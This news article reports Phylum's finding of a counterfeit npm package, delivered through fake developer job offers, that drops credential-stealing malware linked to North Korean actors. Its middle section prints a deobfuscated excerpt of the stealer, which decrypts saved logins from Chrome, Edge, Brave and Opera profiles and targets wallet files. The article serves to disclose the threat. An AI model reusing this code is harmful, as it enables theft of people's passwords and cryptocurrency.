Windows Malware Dropped From Fake Software Developers Job Offers

February 24, 2024 – Phylum, a leader in cybersecurity research, has unveiled a sophisticated malware campaign aimed at software developers seeking employment.

This alarming scheme, identified in collaboration with Palo Alto Network’s Unit 42, involves fake developer job offers that serve as a conduit for delivering malware onto unsuspecting victims’ Windows systems.

You can analyze such malware files, networks, modules, and registry activity with the ANY.RUN malware sandbox, and the Threat Intelligence Lookup which will let you interact with the OS directly from the browser. 

The campaign, linked to North Korean actors, leverages obfuscated JavaScript and has been tied to the notorious BeaverTail malware. This revelation is part of Phylum’s ongoing efforts to safeguard the open-source ecosystem from malicious actors.

The company’s latest findings spotlight an npm package, masquerading as a code profiler that installs malicious scripts designed to steal cryptocurrency and credentials.

According to the Phylum report shared with Cyber Security News, The attackers ingeniously hid their malware within a test file, exploiting the common oversight of developers to scrutinize such code for threats. This tactic, however, contained critical flaws that enabled Phylum’s researchers to connect the malicious package to suspect GitHub repositories, furthering their investigation into these nefarious activities.

On February 5, 2024, an npm user under the alias “nino1234” published a version of the execution-time-async package, closely mimicking the legitimate execution-time utility, which boasts over 27,000 downloads.

This counterfeit package, upon deobfuscation, revealed its true intent: to pilfer login credentials and passwords from various browsers. Following the initial theft, a Python script is downloaded and executed, triggering additional downloads and compromising further personal data.

Stealer supports multiiple browsers

const K = "/AppData/Local/Microsoft/Edge/User Data",
  P = (t, c) => {
    result = "";
    try {
      const r = `${t}`,
        e = require(`${homedir}/store.node`);
      if (osType != "Windows_NT") return;
      const E = "SELECT * FROM logins",
        s = `${H("~/")}${c}`;
      let F = path.join(s, "Local State");
      fs.readFile(F, "utf-8", (t, c) => {
        if (!t) {
          (mkey = JSON.parse(c)),
            (mkey = mkey.os_crypt.encrypted_key),
            (mkey = ((t) => {
              var c = atob(t),
                r = new Uint8Array(c.length);
              for (let t = 0; t < c.length; t++) r[t] = c.charCodeAt(t);
              return r;
            })(mkey));
          try {
            const t = e.CryptUnprotectData(mkey.slice(5));
            for (ii = 0; ii <= 200; ii++) {
              const c = 0 === ii ? "Default" : `Profile ${ii}`,
                e = `${s}/${c}/Login Data`,
                o = `${s}/t${c}`;
              if (!j(e)) continue;
              const F = `${r}_${ii}_Profile`;
              fs.copyFile(e, o, (c) => {
                try {
                  const c = new sqlite3.Database(o);
                  c.all(E, (r, e) => {
                    var E = "";
                    r ||
                      e.forEach((c) => {
                        var r = c.origin_url,
                          e = c.username_value,
                          o = c.password_value;
                        try {
                          "v" === o.subarray(0, 1).toString() &&
                            ((iv = o.subarray(3, 15)),
                            (cip = o.subarray(15, o.length - 16)),
                            cip.length &&
                              ((mmm = crypto.createDecipheriv("aes-256-gcm", t, iv).update(cip)),
                              (E = `${E}W:${r} U: ${e} P:${mmm.toString(
                                "latin1"
                              )}nn`)));
                        } catch (t) {}
                      }),
                      c.close(),
                      fs.unlink(o, (t) => {}),
                      Ut(F, E);
                  });
                } catch (t) {}
              });
            }
          } catch (t) {}
        }
      });
    } catch (t) {}
  },
  ot = [
    [
      "/Library/Application Support/Google/Chrome",
      "/.config/google-chrome",
      "/AppData/Local/Google/Chrome/User Data",
    ],
    [
      "/Library/Application Support/BraveSoftware/Brave-Browser",
      "/.config/BraveSoftware/Brave-Browser",
      "/AppData/Local/BraveSoftware/Brave-Browser/User Data",
    ],
    [
      "/Library/Application Support/com.operasoftware.Opera",
      "/.config/opera",
      "/AppData/Roaming/Opera Software/Opera Stable/User Data"
    ],
  ],
  st = "Local Extension Settings", //Local Extension Settings
  Bt = "solana_id.txt";

Phylum’s discovery has not only shed light on this deceptive operation but has also prompted gratitude from the developer community. Several software developers, having narrowly avoided falling prey to this scheme, thanked Phylum for its pivotal role in raising awareness about this targeted attack.

As the investigation continues, Phylum remains committed to identifying and neutralizing threats within the open-source domain. The company urges developers and organizations alike to remain vigilant, especially when engaging with unsolicited job offers or integrating third-party packages into their projects.

For more technical analysis information on protecting your systems and data from similar threats, visit Phylum’s website or contact their cybersecurity experts directly.

You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are extremely harmful, can wreak havoc, and damage your network.